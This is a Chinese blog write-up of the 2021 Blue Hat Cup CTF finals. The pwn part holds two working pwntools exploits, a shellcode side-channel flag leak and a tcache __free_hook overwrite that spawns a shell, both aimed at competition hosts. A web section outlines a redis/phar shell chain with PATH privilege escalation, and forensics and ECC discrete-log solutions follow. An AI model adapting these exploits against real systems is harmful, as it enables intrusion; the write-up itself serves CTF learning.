2021蓝帽杯总决赛wp

最新推荐文章于 2023-09-18 11:17:20 发布
最新推荐文章于 2023-09-18 11:17:20 发布
阅读量1.2k 收藏 3
点赞数
分类专栏: 蓝帽杯wp 2021 ctf 文章标签: python linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/onl_llo/article/details/119994580
版权
ctf 同时被 3 个专栏收录
3 篇文章 3 订阅
订阅专栏
蓝帽杯wp
1 篇文章 0 订阅
订阅专栏
2021
1 篇文章 0 订阅
订阅专栏

2021蓝帽杯总决赛wp

pwn

secretcode

在这里插入图片描述

程序分析

只允许open和read
read的fd >= 0x14

在这里插入图片描述

shellcode的限制: 不能有00, 会被strcpy截断

在这里插入图片描述

调⽤shellcode时, rax r10执⾏shellcode

在这里插入图片描述

思路: 侧信道泄露flag

先多次open让flag对应的fd为0x14
然后read读⼊⽂件内容到rsp处
爆破[rsp+idx]处的字符, 如果为C, 则死循环, 否则就触发⼀个SIGV

细节:

构造"flag": mov eax, "flag"可以避免00的出现
⼀些⼩常数可以通过xor reg, reg; inc reg构造出来
#! /usr/bin/python
# coding=utf-8
import sys
from pwn import *

#context.log_level = 'debug'
context(arch='amd64', os='linux')

def Log(name):
    log.success(name+' = '+hex(eval(name)))

elf_path = "./pwn"
elf = ELF(elf_path)
#libc = ELF('./libc.so.6')



def Num(n, l=8):
    sh.sendline(str(n))

def Send(c):
    sh.recvuntil('put your secret code ========\n')
    sh.send(c)

def GDB():
    gdb.attach(sh, '''
    break *(0x0000555555554000+0xD7F)
    ''')


def BruteChar(sh, idx, C):
    exp = '''
    xor rax, rax
    mov eax, 0x67616c66
    push rax

    open:
        xor rax, rax
        inc rax
        inc rax
        mov rdi, rsp
        xor rsi, rsi
        syscall
        cmp al, 0x14
        jnz open

    read_flag:
        mov rdi, rax
        xor rax, rax
        mov rsi, rsp
        xor rdx, rdx
        mov dl, 0xff
        syscall

    brute:
        mov al, [rsp+%d]
        cmp al, %d
        jnz die
        jmp brute

    die:
        mov al, [0]
    '''%(idx, C)
    try:
        sh.sendlineafter("put your secret code ========\n", asm(exp))
        sh.recv(timeout=1)
        return True
    except:
        sh.close()
        return False

flag = ''
while len(flag)<0x30:
    for C in range(0x20, 0x7F):
        if(len(sys.argv)==1):			#local
            cmd = ["./pwn"]
            sh = process(cmd)
        else:						#remtoe
            sh = remote("47.104.169.149", 25178)
        
        if(BruteChar(sh, len(flag), C)):
            flag+=chr(C)
            print(flag)
            break

babynote

在这里插入图片描述

程序分析

Add: 读⼊cont之后会在末尾设置00
Edit:

在这里插入图片描述

测试发现, abs(X)%SizeArr[idx] 存在问题, 当offset = - 2^31时
SizeArr[idx] = 0x30时, v1 = -0x20,
Size为0x130时, v1 = - 0x120
造成堆溢出 (我运⽓真好) 因此后⾯ReadNline()时就会溢出前⾯的chunk

思路

1.先申请8个chunk ,然后填满tcache, 从⽽得到⼀个UBchunk
2.然后切割UBchunk, 从⽽遗留下libc地址, 利⽤Edit修改不设置00来泄露libc地址
3.然后利⽤abs(offset)的溢出, 修改chunksize, 把chunk改⼤, 然后释放进Tcache中再
申请出来, 就可以溢出后⾯chunk的fd了

#! /usr/bin/python
# coding=utf-8
import sys
from pwn import *

context.log_level = 'debug'
context(arch='amd64', os='linux')

if(len(sys.argv)==1):			#local
    cmd = ["./pwn"]
    sh = process(cmd)
else:						#remtoe
    sh = remote("47.104.169.149", 14269)

def Log(name):
    log.success(name+' = '+hex(eval(name)))

elf_path = "./pwn"
elf = ELF(elf_path)
libc = ELF('./libc.so.6')

def Num(n, l=8):
    sh.sendline(str(n))

def Cmd(n):
    sh.recvuntil('> ')
    Num(n)

def Add(size, msg=''):
    if msg=="" :
        msg = 'A'*size
    Cmd(1)
    Cmd(size)
    sh.recvuntil('> ')
    sh.send(msg)

def Edit(idx, size, msg):
    Cmd(2)
    Cmd(idx)    
    Cmd(size)
    sh.recvuntil('> ')
    sh.send(msg)

def Delete(idx):
    Cmd(3)
    Cmd(idx)

def Show(idx):
    Cmd(4)
    Cmd(idx)

def GDB():
    gdb.attach(sh, '''
    break *(0x0000555555554000+0xE8E)
    telescope (0x0000555555554000+0x202080) 16
    ''')

#chunk arrange
for i in range(0, 8):
    Add(0x130)
for i in range(0, 3):
    Delete(i)
for i in range(7, 3, -1):
    Delete(i)
Delete(3)       #UB<=> C3, Tcache is full

#split UB chunk
Add(0x8)

#leak libc address
Edit(8, 0, 'A'*8)
Show(8)
sh.recvuntil('A'*8)
libc.address = u64(sh.recv(6)+'\x00\x00')-0x3ebdd0
Log('libc.address')

#heap overflow to forge size
Add(0x130)
exp = cyclic(0x110)
exp+= flat(0, 0x2E0)    #prev_size, size
Edit(9, -(2**31), exp.ljust(0x250, '\x00')) #C9' size = 0x2E0

#Tcache attack
Delete(9)
exp = 'A'*0x130
exp+= flat(0, 0x140, libc.symbols['__free_hook'])
exp+= '\n'
Add(0x2D0, exp)

#getshell
Add(0x130, '/bin/sh\x00'+'\n')
Add(0x130, flat(libc.symbols['system'])+'\n')
Delete(11)

#GDB()
sh.interactive()

发现报错

web

Imagecheck

因为是0day暂时就不发出来了,发后面部分思路

0day redis写shell pop链
随后gzip压缩⼀下 上传 phar打⼀下
在这里插入图片描述
请求/readflag发现需要提权
在这里插入图片描述

下载到本地

在这里插入图片描述
那就PATH提权就好了

在这里插入图片描述在这里插入图片描述

misc

溯源取证

拿到附件是个压缩包,但是打开格式错误,放到工具里面,是个 vmdk,虚拟机文件,直接
挂载
里面有个 001 镜像
在这里插入图片描述
挂载到 R-STUDIO 工具里面得到 flag
在这里插入图片描述

ssh_traffic

在查资料过程中找到 https://ctftime.org/writeup/29392
然后根据条件去安装工具
工具安装过程十分复杂,最后还是安装上了:请参考我的博客,或者我的上一篇文章,有安装教程。
在这里插入图片描述
根据条件修改

在这里插入图片描述
在第二个 tcp 流找到 key,josn
在这里插入图片描述
修改 key
在这里插入图片描述
最后去查找解密后的文本得flag
在这里插入图片描述

crypto

cravk point

离散对数求解,key只有40位可以跑
参考链接:https://blog.csdn.net/ckm1607011/article/details/106849551/

p = 199577891335523667447918233627928226021
E = EllipticCurve(GF(p), [1, 0, 0, 6745936378050226004298256621352165803,
27906538695990793423441372910027591553])
print(E)
G = E.gen(0)
public = E(xxxxxxxxxx,xxxxxxxxxxxx)
point_1 = E(xxxxxxxxxxxx,xxxxxxxxxxxxxx)
cipher = E(xxxxxxxxxxx,xxxxxxxxxx)
# 大步小步求key
# key=bsgs(G,point_1,(0,2^40),operation='+')
# print(key)
#key=436370150383
point_2=key*public
M=cipher-point_2
print(int(M[0])+int(M[1]))

微信号:西域大都护府,我们将每天更新一些比较有意思的靶场做法以及,一些实战文章,欢迎大家来关注谢谢!

在这里插入图片描述

Draper.?
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2021 蓝帽杯 pwn slient
weixin_51298357的博客
04-29 869
2021 蓝帽杯 pwn slient 这道题不是第一个上的pwn题,第一道太难了,第二个一出来就去看第二个题了= = 一个沙箱绕过的题,以前没写过类似的,当场也没有写出来,于是复现一下。 前置知识 seccomp概述 restrict模式:SECCOMP_SET_MODE_STRICT 白名单:read,write,_exit,sigreturn 除了已经打开的文件描述符和允许的系统调用,如果发起其他系统调用,内核会使用SIGKILL或SIGSYS终止进程 filter模式:SECCOMP
红帽杯wp红帽杯wp
05-06
红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp
蓝帽杯2022年半决赛 writeup(附取证题目+解压密码+附件)
mumuzi的博客
08-05 8513
CTF-MISC取证专项练习(更新ing)
qq_52820087的博客
10-13 2455
CTF-MISC取证专项练习
第四届蓝帽杯文件包含题writeup
lms29355的博客
08-24 356
第四届蓝帽杯文件包含解题wp;思路
2022第六届蓝帽杯部分题目题解
m0_63525319的博客
10-24 371
主要讲述了本团队做出来的题目,如果有错误,大家多多指教
2022蓝帽杯初赛
cppuHsir的博客
07-22 438
2022蓝帽杯初赛题目
第六届”蓝帽杯“全国大学生网络安全技能大赛(半决赛)其他赛题
08-05
【标题】:“第六届”蓝帽杯“全国大学生网络安全技能大赛(半决赛)其他赛题”揭示了这是一场聚焦网络安全的竞赛,旨在提升大学生在网络安全领域的技能和实战能力。蓝帽杯作为一项知名的赛事,每年都会吸引众多学子...
【电子取证】网站取证(第六届”蓝帽杯“全国大学生网络安全技能大赛)
07-12
在第六届“蓝帽杯”全国大学生网络安全技能大赛中,参赛者可能需要掌握这项技术来解决实际问题。电子取证,也被称为数字取证,是指在法律允许的范围内,对电子设备中的数据进行收集、分析、验证,以获取与法律纠纷或...
【电子取证】程序分析(第六届”蓝帽杯“全国大学生网络安全技能大赛)
07-12
第六届”蓝帽杯“全国大学生网络安全技能大赛
蓝帽杯one_Pointer_php writeup
05-10
蓝帽杯one_Pointer_php writeup
2022-第六届”蓝帽杯“全国大学生网络安全技能大赛 wp(WriteUp)
一位热爱网安的年轻人的博客
07-10 883
第六届”蓝帽杯“全国大学生网络安全技能大赛 wp
2022蓝帽杯初赛部分wp
qq_55882340的博客
07-11 1131
2022年蓝帽杯初赛部分wp
2022蓝帽杯初赛取证部分wp(详细)
qq_63522833的博客
07-10 2557
目录前言手机取证_1&2程序分析_1&2&3计算机取证_2&3&4 前言 本文是2022蓝帽杯初赛取证部分复盘,感觉题目难度适中,因此选择性的记录了做出来的部分。这不是本次比赛完整的WP,如果有需要可以翻一翻其他大师傅的文章 手机取证_1&2 题目描述: 现对一个苹果手机进行取证,请您对以下问题进行分析解答。 1.627604C2-C586-48C1-AA16-FF33C3022159.PNG图片的分辨率是?(答案参考格式:1920x1080) 2.姜总的
蓝帽杯2022初赛 部分wp
akxnxbshai的博客
07-10 854
蓝帽杯2022初赛部分wp
2022 第六届蓝帽杯初赛 WP By 知行网安
xczzhf的博客
07-11 1349
第六届蓝帽杯wp
2022蓝帽杯初赛wp
mumuzi的博客
07-10 5076
2022蓝帽初赛
2022蓝帽杯wp
hez__的博客
07-10 601
蓝帽杯 2022 wp
2023年第七届蓝帽杯半决赛WPCTF&取证)
weixin_63576152的博客
09-18 1455
打开xlsx文件,打开以后,发现没有字,ctrl+a全选,修改你字体颜色,发现有些加粗,有些没加粗,结合题目,应当排序,将每一列从小到大排序,将加粗的单元格改成黑色,将列宽改为2,得到二维码,扫描后得到flag。对SMS.txt的加密逻辑是先AES加密,再base64加密,AES的秘钥在Getkey函数中。base64解码calllog.txt,得到通话记录,搜索10086结果是2条,且都为呼进。Base64、BASE64都是错的,答案格式模糊,而且base64是编码,不是很懂。
2023蓝帽杯初赛misc下载
最新发布
12-04
2023蓝帽杯初赛misc下载是指在2023年举办的蓝帽杯网络安全竞赛中的一项miscellaneous(杂项)类题目的下载。在初赛中,参赛选手需要下载与miscellaneous相关的题目文件或资源,并进行分析和解决。 首先,参赛选手...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值